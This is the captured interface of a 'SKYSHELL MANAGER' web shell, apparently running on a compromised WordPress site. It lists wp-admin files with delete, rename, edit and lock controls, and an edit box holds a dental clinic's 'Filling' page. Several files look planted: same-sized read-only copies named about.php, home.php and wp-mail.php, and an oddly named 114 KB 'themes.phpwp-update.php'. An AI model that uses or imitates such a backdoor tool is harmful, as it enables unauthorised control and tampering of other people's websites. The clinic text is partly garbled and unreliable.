📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: filling.php
<!DOCTYPE html> <!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ --> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"> <!--<![endif]--> <head> <meta charset="utf-8"/> <!-- Set the viewport width to device width for mobile --> <meta name="viewport" content="width=device-width"/> <title>Lion DentalCare</title> <link rel="icon" href="img/favico.png" type="image/png" sizes="16x16"> <!-- CSS Files--> <link rel="stylesheet" href="stylesheets/style.css"> <link rel="stylesheet" href="stylesheets/skins/blue.css"> <!-- skin color --> <link rel="stylesheet" href="stylesheets/responsive.css"> <!-- IE Fix for HTML5 Tags --> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css" integrity="sha384-50oBUHEmvpQ+1lW4y57PTFmhCaXp0ML5d60M1M7uH2+nqUivzIebhndOJK28anvf" crossorigin="anonymous"> </head> <body> <!-- HIDDEN PANEL ================================================== --> <div id="panel"> <div class="row"> <div class="four columns"> <p><b>Give us a call :</b> (+91) 80987 89587 </p> </div> <div class="four columns"> <p><b>Mail :</b> contact@liondentalcare.com</p> </div> <div class="three columns"> <p><b>Mon - Sat :</b> 08.00am - 18.00pm</p> </div> </div> </div> <p class="slide"> <a href="#" class="btn-slide"></a> </p> <!-- HEADER ================================================== --> <div class="row"> <div class="headerlogo four columns"> <div class="logo"> <a href="index.php"> <img src="img/logolion.png"> </a> </div> </div> <div class="headermenu eight columns noleftmarg"> <nav id="nav-wrap"> <ul id="main-menu" class="nav-bar sf-menu"> <li class="current"> <a href="index.php">HOME</a> </li> <li class="current"> <a href="about.php">ABOUT US</a> </li> <li> <a href="general.php">SERVICES</a> <ul> <li><a href="general.php">General Dentistry</a> <ul style="margin-left:60px;"> <li><a href="dental-exam.php">Dental Examination</a></li> <li><a href="digital-xray.php">Digital x-ray and Intra-oral camera</a></li> <li><a href="sedation.php">Sedation Dentistry</a></li> <li><a href="prophylaxis.php">Dental Prophylaxis</a></li> <li><a href="gum.php">Periodontal disease/Gum disease</a></li> <li><a href="implants.php">Dental Implants</a></li> <li><a href="root-canal.php">Root Canal</a></li> <li><a href="crown.php">Crowns and Bridge</a></li> <li><a href="filling.php">Filling</a></li> <li><a href="extraction.php">Extraction</a></li> <li><a href="night.php">Night Guard</a></li> <li><a href="partial.php">Partial and Complete Dentures</a></li> </ul> </li> <li><a href="cosmetic.php">Cosmetic Dentistry</a> <ul style="margin-left:60px;"> <li><a href="porcelain.php">Porcelain Veneers</a></li> <li><a href="luminers.php">Lumineers</a></li> <li><a href="bonding.php">Bonding</a></li> <li><a href="implants.php">Dental Implants</a></li> <li><a href="smile.php">Snap-On Smile</a></li> <li><a href="zoom.php">Zoom Whitening</a></li> </ul> </li> <li><a href="orthodontics.php">Orthodontic Services</a> <ul style="margin-left:60px;"> <li><a href="invisalign.php">Invisalign</a></li> </ul> </li> <li><a href="#">Other Services</a> <ul style="margin-left:60px;"> <li><a href="snoring.php">Snoring Appliance</a></li> <li><a href="night.php">NTI-tss Plus Night Guard</a></li> <li><a href="implants.php">Dental Implants</a></li> <li><a href="oral-surgery.php">Oral Surgery</a></li> </ul> </li> </ul> </li> <li> <a href="blog.php">BLOG</a> </li> <li> <a href="contact.php">CONTACT</a> </li> </ul> </nav> </div> </div> <div class="clear"> </div> <!-- SUBHEADER ================================================== --> <div id="subheader"> <div class="row"> <div class="twelve columns"> <p class="left"> SERVICES </p> <p class="right"> Filling </p> </div> </div> </div> <div class="hr"> </div> <!-- CONTENT ================================================== --> <div class="row" style="margin-top:50px;"> <div class="eight columns"> <h4>Filling</h4> <p>A filling is required when the bacteria caused by the acidic content of the food reacts with the toothComposite Fillings 77379 enamel and causes it to decay. .</p> <p>This process of decay requires immediate attention and if not addressed on time may lead to detrimental results. This is why, it is important that a minor cavity may seem a filling is a must requirement.</p> <p>Our Dr addresses the cavity in a conservative and contemporary fashion. Composite fillings remain in vogue, rather than the silver ones which not only are aesthetically unattractive, but also do not happen to offer any dental benefits. The composite ones, not only blend with the white color of the teeth but also retain 85 to 90% of tooth strength. The almost instantaneous bond with the tooth offer ease in the procedure unlike other fillings which may require a day or two to settle.</p> </div> <div class="four columns"> <img src="img/de15.jpg" style="border: 5px solid #d09022;width:100%;"> </div> </div> <div class="hr"> </div> <!-- FOOOTER ================================================== --> <div id="footer"> <footer class="row"> <p class="back-top floatright"> <a href="#top"><span></span></a> </p> <div class="six columns"> <h1 style="color:#000000;">ABOUT US</h1> <p style="color:#ffffff;text-align:justify;">Our Lion DentalCare is to strive to deliver the highest level of dental care to our patients. Our Dr believes that listening to patients dental concerns and needs is one of the most important jobs. With Our team, aims at providing well planned, carefully executed dentistry to achieve results that have patient’s teeth last a life time. Professional and patient-friendly staff make patients feel cared for and valued. The Lion DentalCare was set up on the 1st of June 2018 by Our Chief..</p> </div> <div class="three columns"> <h1 style="color:#000000;">QUICK LINKS</h1> <p><a style="color:#ffffff;" href="about.php">About Us</a></p> <p><a style="color:#ffffff;" href="general.php">Services</a></p> <p><a style="color:#ffffff;" href="blog.php">Blog</a></p> <p><a style="color:#ffffff;" href="contact.php">Contact</a></p> </div> <div class="three columns"> <h1 style="color:#000000;">QUICK LINKS</h1> <p><a style="color:#ffffff;" href="privacy.php">Privacy Policy</a></p> <p><a style="color:#ffffff;" href="terms.php">Terms and Conditions</a></p> <p><a style="color:#ffffff;" href="subscribe.php">Subscribe</a></p> <p><a style="color:#ffffff;" href="unsubscribe.php">Unsubscribe</a></p> </div> </footer> </div> <div class="copyright"> <div class="row"> <div class="six columns"> ©<span class="small" style="color:#ffffff;">2025 All Rights Reserved | Lion DentalCare</span> </div> </div> </div> <!-- JAVASCRIPTS ================================================== --> <!-- Javascript files placed here for faster loading --> <script src="javascripts/foundation.min.js"></script> <script src="javascripts/jquery.easing.1.3.js"></script> <script src="javascripts/elasticslideshow.js"></script> <script src="javascripts/jquery.carouFredSel-6.0.5-packed.js"></script> <script src="javascripts/jquery.cycle.js"></script> <script src="javascripts/app.js"></script> <script src="javascripts/modernizr.foundation.js"></script> <script src="javascripts/slidepanel.js"></script> <script src="javascripts/scrolltotop.js"></script> <script src="javascripts/hoverIntent.js"></script> <script src="javascripts/superfish.js"></script> <script src="javascripts/responsivemenu.js"></script> </body> </html>
Save